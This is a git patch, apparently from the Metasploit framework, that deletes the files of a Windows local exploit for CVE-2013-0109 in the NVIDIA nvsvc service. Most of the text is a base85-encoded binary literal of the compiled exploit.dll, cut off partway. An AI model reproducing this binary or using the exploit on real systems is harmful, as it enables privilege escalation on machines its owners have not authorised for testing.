From c7361043ae20a59b9f3fafd0f7fd8a086068593f Mon Sep 17 00:00:00 2001 
From: jvazquez-r7
Date: Wed, 17 Jul 2013 11:47:06 -0500
Subject: [PATCH] up to date
---
 data/exploits/CVE-2013-0109/exploit.dll | Bin 52224 -> 0 bytes
 .../source/exploits/cve-2013-0109/LICENSE.txt | 25 -
 .../source/exploits/cve-2013-0109/Readme.md | 40 --
 .../cve-2013-0109/dll/reflective_dll.sln | 20 -
 .../cve-2013-0109/dll/reflective_dll.vcproj | 357 ------------
 .../cve-2013-0109/dll/reflective_dll.vcxproj | 266 ---------
 .../dll/reflective_dll.vcxproj.filters | 32 --
 .../dll/reflective_dll.vcxproj.user | 3 -
 .../dll/src/ReflectiveDLLInjection.h | 51 --
 .../cve-2013-0109/dll/src/ReflectiveDll.c | 33 --
 .../cve-2013-0109/dll/src/ReflectiveLoader.c | 496 ----------------
 .../cve-2013-0109/dll/src/ReflectiveLoader.h | 203 -------
 .../cve-2013-0109/dll/src/exploit.cpp | 537 ------------------
 .../source/exploits/cve-2013-0109/rdi.sln | 32 --
 .../exploits/windows/local/nvidia_nvsvc.rb | 188 ------
 15 files changed, 2283 deletions(-)
 delete mode 100644 data/exploits/CVE-2013-0109/exploit.dll
 delete mode 100644 external/source/exploits/cve-2013-0109/LICENSE.txt
 delete mode 100644 external/source/exploits/cve-2013-0109/Readme.md
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.sln
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcproj
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.filters
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/reflective_dll.vcxproj.user
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDLLInjection.h
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveDll.c
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.c
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/ReflectiveLoader.h
 delete mode 100644 external/source/exploits/cve-2013-0109/dll/src/exploit.cpp
 delete mode 100644 external/source/exploits/cve-2013-0109/rdi.sln
 delete mode 100644 modules/exploits/windows/local/nvidia_nvsvc.rb
diff --git a/data/exploits/CVE-2013-0109/exploit.dll b/data/exploits/CVE-2013-0109/exploit.dll deleted file mode 100644 index 8fabac9fb53c58ff9f391bfea4fe9104d383554d..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 52224 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 
